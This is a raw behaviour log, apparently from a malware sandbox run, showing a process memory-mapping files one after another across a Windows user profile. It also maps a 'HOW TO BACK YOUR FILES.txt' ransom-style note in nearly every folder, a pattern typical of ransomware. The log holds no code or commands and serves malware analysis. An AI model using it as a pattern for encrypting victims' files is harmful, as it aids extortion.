Create Mapping C:\Documents and Settings\FD1HVy\Videos\9ons\2eLTi4fiQ5NoAFf\6 iJ LK5SpJWis.mkv filename = C:\Documents and Settings\FD1HVy\Videos\9ons\2eLTi4fiQ5NoAFf\6 iJ LK5SpJWis.mkv, protection = PAGE_READWRITE, maximum_size = 73312 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Videos\9ons\2eLTi4fiQ5NoAFf\FeNApexe.swf filename = C:\Documents and Settings\FD1HVy\Videos\9ons\2eLTi4fiQ5NoAFf\FeNApexe.swf, protection = PAGE_READWRITE, maximum_size = 33888 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Videos\9ons\2eLTi4fiQ5NoAFf\fRSFPyN.avi filename = C:\Documents and Settings\FD1HVy\Videos\9ons\2eLTi4fiQ5NoAFf\fRSFPyN.avi, protection = PAGE_READWRITE, maximum_size = 54128 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Videos\9ons\2eLTi4fiQ5NoAFf\Y_--WjEi-7.mp4 filename = C:\Documents and Settings\FD1HVy\Videos\9ons\2eLTi4fiQ5NoAFf\Y_--WjEi-7.mp4, protection = PAGE_READWRITE, maximum_size = 54192 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Videos\9ons\2eLTi4fiQ5NoAFf\zcIRvyjTGm3.mp4 filename = C:\Documents and Settings\FD1HVy\Videos\9ons\2eLTi4fiQ5NoAFf\zcIRvyjTGm3.mp4, protection = PAGE_READWRITE, maximum_size = 62864 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Videos\9ons\2eLTi4fiQ5NoAFf\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\Videos\9ons\2eLTi4fiQ5NoAFf\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Templates\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\Templates\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Start Menu\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\Start Menu\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Start Menu\Programs\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\Start Menu\Programs\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Start Menu\Programs\Windows PowerShell\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\Start Menu\Programs\Windows PowerShell\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Start Menu\Programs\System Tools\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\Start Menu\Programs\System Tools\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Start Menu\Programs\Startup\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\Start Menu\Programs\Startup\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Start Menu\Programs\Maintenance\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\Start Menu\Programs\Maintenance\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Start Menu\Programs\Administrative Tools\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\Start Menu\Programs\Administrative Tools\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Start Menu\Programs\Accessories\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\Start Menu\Programs\Accessories\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Start Menu\Programs\Accessibility\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\Start Menu\Programs\Accessibility\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\SendTo\Compressed (zipped) Folder.ZFSendToTarget filename = C:\Documents and Settings\FD1HVy\SendTo\Compressed (zipped) Folder.ZFSendToTarget, protection = PAGE_READWRITE, maximum_size = 784 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\SendTo\Desktop (create shortcut).DeskLink filename = C:\Documents and Settings\FD1HVy\SendTo\Desktop (create shortcut).DeskLink, protection = PAGE_READWRITE, maximum_size = 784 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\SendTo\Mail Recipient.MAPIMail filename = C:\Documents and Settings\FD1HVy\SendTo\Mail Recipient.MAPIMail, protection = PAGE_READWRITE, maximum_size = 784 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\SendTo\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\SendTo\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Searches\winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms filename = C:\Documents and Settings\FD1HVy\Searches\winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms, protection = PAGE_READWRITE, maximum_size = 1632 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Searches\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\Searches\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Saved Games\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\Saved Games\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Recent\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\Recent\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Recent\CustomDestinations\28c8b86deab549a1.customDestinations-ms filename = C:\Documents and Settings\FD1HVy\Recent\CustomDestinations\28c8b86deab549a1.customDestinations-ms, protection = PAGE_READWRITE, maximum_size = 5936 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms filename = C:\Documents and Settings\FD1HVy\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms, protection = PAGE_READWRITE, maximum_size = 6224 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms filename = C:\Documents and Settings\FD1HVy\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms, protection = PAGE_READWRITE, maximum_size = 20992 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Recent\CustomDestinations\7e4dca80246863e3.customDestinations-ms filename = C:\Documents and Settings\FD1HVy\Recent\CustomDestinations\7e4dca80246863e3.customDestinations-ms, protection = PAGE_READWRITE, maximum_size = 800 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Recent\CustomDestinations\9d1f905ce5044aee.customDestinations-ms filename = C:\Documents and Settings\FD1HVy\Recent\CustomDestinations\9d1f905ce5044aee.customDestinations-ms, protection = PAGE_READWRITE, maximum_size = 2384 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Recent\CustomDestinations\f01b4d95cf55d32a.customDestinations-ms filename = C:\Documents and Settings\FD1HVy\Recent\CustomDestinations\f01b4d95cf55d32a.customDestinations-ms, protection = PAGE_READWRITE, maximum_size = 800 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Recent\CustomDestinations\f18460fded109990.customDestinations-ms filename = C:\Documents and Settings\FD1HVy\Recent\CustomDestinations\f18460fded109990.customDestinations-ms, protection = PAGE_READWRITE, maximum_size = 800 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Recent\CustomDestinations\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\Recent\CustomDestinations\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\1044f75bed7c89a3.automaticDestinations-ms filename = C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\1044f75bed7c89a3.automaticDestinations-ms, protection = PAGE_READWRITE, maximum_size = 2304 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\162797d679096999.automaticDestinations-ms filename = C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\162797d679096999.automaticDestinations-ms, protection = PAGE_READWRITE, maximum_size = 3328 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\1b4dd67f29cb1962.automaticDestinations-ms filename = C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\1b4dd67f29cb1962.automaticDestinations-ms, protection = PAGE_READWRITE, maximum_size = 3840 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\1b6ebacd7cd2f25a.automaticDestinations-ms filename = C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\1b6ebacd7cd2f25a.automaticDestinations-ms, protection = PAGE_READWRITE, maximum_size = 3328 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\1bc9bbbe61f14501.automaticDestinations-ms filename = C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\1bc9bbbe61f14501.automaticDestinations-ms, protection = PAGE_READWRITE, maximum_size = 3328 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\319f01bf9fe00f2d.automaticDestinations-ms filename = C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\319f01bf9fe00f2d.automaticDestinations-ms, protection = PAGE_READWRITE, maximum_size = 4352 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\5175b273ceba776b.automaticDestinations-ms filename = C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\5175b273ceba776b.automaticDestinations-ms, protection = PAGE_READWRITE, maximum_size = 3328 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\5f7b5f1e01b83767.automaticDestinations-ms filename = C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\5f7b5f1e01b83767.automaticDestinations-ms, protection = PAGE_READWRITE, maximum_size = 72448 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\61ebb1e65cfcb8da.automaticDestinations-ms filename = C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\61ebb1e65cfcb8da.automaticDestinations-ms, protection = PAGE_READWRITE, maximum_size = 3328 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\6824f4a902c78fbd.automaticDestinations-ms filename = C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\6824f4a902c78fbd.automaticDestinations-ms, protection = PAGE_READWRITE, maximum_size = 3328 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\6d2bac8f1edf6668.automaticDestinations-ms filename = C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\6d2bac8f1edf6668.automaticDestinations-ms, protection = PAGE_READWRITE, maximum_size = 3328 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\75668a91ce73b054.automaticDestinations-ms filename = C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\75668a91ce73b054.automaticDestinations-ms, protection = PAGE_READWRITE, maximum_size = 3328 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\78f0afb5bd4bb278.automaticDestinations-ms filename = C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\78f0afb5bd4bb278.automaticDestinations-ms, protection = PAGE_READWRITE, maximum_size = 3328 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\7e4dca80246863e3.automaticDestinations-ms filename = C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\7e4dca80246863e3.automaticDestinations-ms, protection = PAGE_READWRITE, maximum_size = 8960 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\80d13f95c2c02af9.automaticDestinations-ms filename = C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\80d13f95c2c02af9.automaticDestinations-ms, protection = PAGE_READWRITE, maximum_size = 3328 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\9c08ad74ad8708df.automaticDestinations-ms filename = C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\9c08ad74ad8708df.automaticDestinations-ms, protection = PAGE_READWRITE, maximum_size = 3328 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\9cfafb05ce914942.automaticDestinations-ms filename = C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\9cfafb05ce914942.automaticDestinations-ms, protection = PAGE_READWRITE, maximum_size = 3328 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\9d1f905ce5044aee.automaticDestinations-ms filename = C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\9d1f905ce5044aee.automaticDestinations-ms, protection = PAGE_READWRITE, maximum_size = 3840 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\b8ab77100df80ab2.automaticDestinations-ms filename = C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\b8ab77100df80ab2.automaticDestinations-ms, protection = PAGE_READWRITE, maximum_size = 3328 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\b8b3a97bfbf120b6.automaticDestinations-ms filename = C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\b8b3a97bfbf120b6.automaticDestinations-ms, protection = PAGE_READWRITE, maximum_size = 3328 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\d00655d2aa12ff6d.automaticDestinations-ms filename = C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\d00655d2aa12ff6d.automaticDestinations-ms, protection = PAGE_READWRITE, maximum_size = 3328 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms filename = C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms, protection = PAGE_READWRITE, maximum_size = 35584 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\fb3b0dbfee58fac8.automaticDestinations-ms filename = C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\fb3b0dbfee58fac8.automaticDestinations-ms, protection = PAGE_READWRITE, maximum_size = 3328 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\PrintHood\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\PrintHood\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Pictures\0dkB4I3aeR0WhEp.jpg filename = C:\Documents and Settings\FD1HVy\Pictures\0dkB4I3aeR0WhEp.jpg, protection = PAGE_READWRITE, maximum_size = 95424 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Pictures\0NqnB5j6.jpg filename = C:\Documents and Settings\FD1HVy\Pictures\0NqnB5j6.jpg, protection = PAGE_READWRITE, maximum_size = 85376 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Pictures\1Rut_CZp95E3.png filename = C:\Documents and Settings\FD1HVy\Pictures\1Rut_CZp95E3.png, protection = PAGE_READWRITE, maximum_size = 80128 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Pictures\2dOcoM_aN0.png filename = C:\Documents and Settings\FD1HVy\Pictures\2dOcoM_aN0.png, protection = PAGE_READWRITE, maximum_size = 61184 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Pictures\3jFFHm8Ce9nlSPpERMKA.jpg filename = C:\Documents and Settings\FD1HVy\Pictures\3jFFHm8Ce9nlSPpERMKA.jpg, protection = PAGE_READWRITE, maximum_size = 99296 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Pictures\4xy1qpl4hklhR.gif filename = C:\Documents and Settings\FD1HVy\Pictures\4xy1qpl4hklhR.gif, protection = PAGE_READWRITE, maximum_size = 14848 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Pictures\6b0 5cwb.gif filename = C:\Documents and Settings\FD1HVy\Pictures\6b0 5cwb.gif, protection = PAGE_READWRITE, maximum_size = 86384 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Pictures\74BtE9_7W-bUHV-i.bmp filename = C:\Documents and Settings\FD1HVy\Pictures\74BtE9_7W-bUHV-i.bmp, protection = PAGE_READWRITE, maximum_size = 31408 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Pictures\8gQHWG8D1b-WZD8.jpg filename = C:\Documents and Settings\FD1HVy\Pictures\8gQHWG8D1b-WZD8.jpg, protection = PAGE_READWRITE, maximum_size = 35824 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Pictures\8SeBXCtLhthpcg.jpg filename = C:\Documents and Settings\FD1HVy\Pictures\8SeBXCtLhthpcg.jpg, protection = PAGE_READWRITE, maximum_size = 73056 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Pictures\9DYO94n5aNmm9ydACWU.jpg filename = C:\Documents and Settings\FD1HVy\Pictures\9DYO94n5aNmm9ydACWU.jpg, protection = PAGE_READWRITE, maximum_size = 95072 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Pictures\a3E6ONcMIha.jpg filename = C:\Documents and Settings\FD1HVy\Pictures\a3E6ONcMIha.jpg, protection = PAGE_READWRITE, maximum_size = 88400 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Pictures\apZJaH9FN.bmp filename = C:\Documents and Settings\FD1HVy\Pictures\apZJaH9FN.bmp, protection = PAGE_READWRITE, maximum_size = 41200 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Pictures\b64pLn92L.png filename = C:\Documents and Settings\FD1HVy\Pictures\b64pLn92L.png, protection = PAGE_READWRITE, maximum_size = 73824 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Pictures\eKa9s0OxrKnuzW9m_jl.bmp filename = C:\Documents and Settings\FD1HVy\Pictures\eKa9s0OxrKnuzW9m_jl.bmp, protection = PAGE_READWRITE, maximum_size = 97408 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Pictures\epArqwSa7RO.png filename = C:\Documents and Settings\FD1HVy\Pictures\epArqwSa7RO.png, protection = PAGE_READWRITE, maximum_size = 40256 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Pictures\Ex pA.jpg filename = C:\Documents and Settings\FD1HVy\Pictures\Ex pA.jpg, protection = PAGE_READWRITE, maximum_size = 15744 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Pictures\FLboYyMvap3QSfr_G.gif filename = C:\Documents and Settings\FD1HVy\Pictures\FLboYyMvap3QSfr_G.gif, protection = PAGE_READWRITE, maximum_size = 14736 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Pictures\hWRjDv4Dj80gAU.jpg filename = C:\Documents and Settings\FD1HVy\Pictures\hWRjDv4Dj80gAU.jpg, protection = PAGE_READWRITE, maximum_size = 32544 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Pictures\j7GygMimmKlF.bmp filename = C:\Documents and Settings\FD1HVy\Pictures\j7GygMimmKlF.bmp, protection = PAGE_READWRITE, maximum_size = 37776 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Pictures\jEdokHr2EgPgrGWyVHAH.bmp filename = C:\Documents and Settings\FD1HVy\Pictures\jEdokHr2EgPgrGWyVHAH.bmp, protection = PAGE_READWRITE, maximum_size = 25152 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Pictures\jrwTmARnBghnUWTW.jpg filename = C:\Documents and Settings\FD1HVy\Pictures\jrwTmARnBghnUWTW.jpg, protection = PAGE_READWRITE, maximum_size = 82752 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Pictures\JSELpO-F0Y.bmp filename = C:\Documents and Settings\FD1HVy\Pictures\JSELpO-F0Y.bmp, protection = PAGE_READWRITE, maximum_size = 22496 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Pictures\ks9tykG.gif filename = C:\Documents and Settings\FD1HVy\Pictures\ks9tykG.gif, protection = PAGE_READWRITE, maximum_size = 92640 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Pictures\kuXIqR7PtqeMEg4X.gif filename = C:\Documents and Settings\FD1HVy\Pictures\kuXIqR7PtqeMEg4X.gif, protection = PAGE_READWRITE, maximum_size = 50272 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Pictures\Lf YVLL3lHH9mBY.png filename = C:\Documents and Settings\FD1HVy\Pictures\Lf YVLL3lHH9mBY.png, protection = PAGE_READWRITE, maximum_size = 9408 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Pictures\M FAL8HMMU.jpg filename = C:\Documents and Settings\FD1HVy\Pictures\M FAL8HMMU.jpg, protection = PAGE_READWRITE, maximum_size = 73408 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Pictures\nKAALB7g8JVy3bNicZAV.png filename = C:\Documents and Settings\FD1HVy\Pictures\nKAALB7g8JVy3bNicZAV.png, protection = PAGE_READWRITE, maximum_size = 71664 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Pictures\ns2m9GT_sYgG6NU.jpg filename = C:\Documents and Settings\FD1HVy\Pictures\ns2m9GT_sYgG6NU.jpg, protection = PAGE_READWRITE, maximum_size = 55744 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Pictures\qQZElOqALjjZs185FSJ.bmp filename = C:\Documents and Settings\FD1HVy\Pictures\qQZElOqALjjZs185FSJ.bmp, protection = PAGE_READWRITE, maximum_size = 95904 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Pictures\QrmX5zar4TeL3G.png filename = C:\Documents and Settings\FD1HVy\Pictures\QrmX5zar4TeL3G.png, protection = PAGE_READWRITE, maximum_size = 34656 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Pictures\Sv PS_0og2kRetH-P.jpg filename = C:\Documents and Settings\FD1HVy\Pictures\Sv PS_0og2kRetH-P.jpg, protection = PAGE_READWRITE, maximum_size = 60464 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Pictures\T4b_BS -CrryhZvHxt.bmp filename = C:\Documents and Settings\FD1HVy\Pictures\T4b_BS -CrryhZvHxt.bmp, protection = PAGE_READWRITE, maximum_size = 22352 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Pictures\t6mmG49Ik.bmp filename = C:\Documents and Settings\FD1HVy\Pictures\t6mmG49Ik.bmp, protection = PAGE_READWRITE, maximum_size = 73904 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Pictures\UpDUBx3NVg2.gif filename = C:\Documents and Settings\FD1HVy\Pictures\UpDUBx3NVg2.gif, protection = PAGE_READWRITE, maximum_size = 82784 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Pictures\v4ZDHE a-uoAR3Cw_zY0.jpg filename = C:\Documents and Settings\FD1HVy\Pictures\v4ZDHE a-uoAR3Cw_zY0.jpg, protection = PAGE_READWRITE, maximum_size = 96528 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Pictures\Zo_fD_dUydT2ng.gif filename = C:\Documents and Settings\FD1HVy\Pictures\Zo_fD_dUydT2ng.gif, protection = PAGE_READWRITE, maximum_size = 77040 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Pictures\_tGw8TZHXe.jpg filename = C:\Documents and Settings\FD1HVy\Pictures\_tGw8TZHXe.jpg, protection = PAGE_READWRITE, maximum_size = 76224 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Pictures\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\Pictures\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Pictures\Saved Pictures\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\Pictures\Saved Pictures\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Pictures\Camera Roll\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\Pictures\Camera Roll\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\OneDrive\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\OneDrive\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\NetHood\HOW TO BACK YOUR FILES.txt filename = C:\Documents and Settings\FD1HVy\NetHood\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\-HEK-DXQ3wmbagAJfJY.pptx filename = C:\Documents and Settings\FD1HVy\My Documents\-HEK-DXQ3wmbagAJfJY.pptx, protection = PAGE_READWRITE, maximum_size = 49936 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\BZ4TrAu8yl96JSfZ.pptx filename = C:\Documents and Settings\FD1HVy\My Documents\BZ4TrAu8yl96JSfZ.pptx, protection = PAGE_READWRITE, maximum_size = 12784 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\cHQW.ods filename = C:\Documents and Settings\FD1HVy\My Documents\cHQW.ods, protection = PAGE_READWRITE, maximum_size = 22560 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\cxezl6TYX11ixWRNjCV.docx filename = C:\Documents and Settings\FD1HVy\My Documents\cxezl6TYX11ixWRNjCV.docx, protection = PAGE_READWRITE, maximum_size = 49504 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\Database1.accdb filename = C:\Documents and Settings\FD1HVy\My Documents\Database1.accdb, protection = PAGE_READWRITE, maximum_size = 348928 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\dj05M a9Ph9ACFyExLrh.docx filename = C:\Documents and Settings\FD1HVy\My Documents\dj05M a9Ph9ACFyExLrh.docx, protection = PAGE_READWRITE, maximum_size = 66240 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\F4NHuiDmUc26bw37Go.xlsx filename = C:\Documents and Settings\FD1HVy\My Documents\F4NHuiDmUc26bw37Go.xlsx, protection = PAGE_READWRITE, maximum_size = 77536 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\FhduDA Hp_S.pptx filename = C:\Documents and Settings\FD1HVy\My Documents\FhduDA Hp_S.pptx, protection = PAGE_READWRITE, maximum_size = 70128 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\FMoEmzd4.docx filename = C:\Documents and Settings\FD1HVy\My Documents\FMoEmzd4.docx, protection = PAGE_READWRITE, maximum_size = 95472 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\hGEAu7lMb4Z5lAjdw.pptx filename = C:\Documents and Settings\FD1HVy\My Documents\hGEAu7lMb4Z5lAjdw.pptx, protection = PAGE_READWRITE, maximum_size = 21216 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\Hy99X-RH7W-oRpNxJm.pptx filename = C:\Documents and Settings\FD1HVy\My Documents\Hy99X-RH7W-oRpNxJm.pptx, protection = PAGE_READWRITE, maximum_size = 29152 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\My Documents\IZ-akFBweN.xlsx filename = C:\Documents and Settings\FD1HVy\My Documents\IZ-akFBweN.xlsx, protection = PAGE_READWRITE, maximum_size = 79712 True 1
Fn
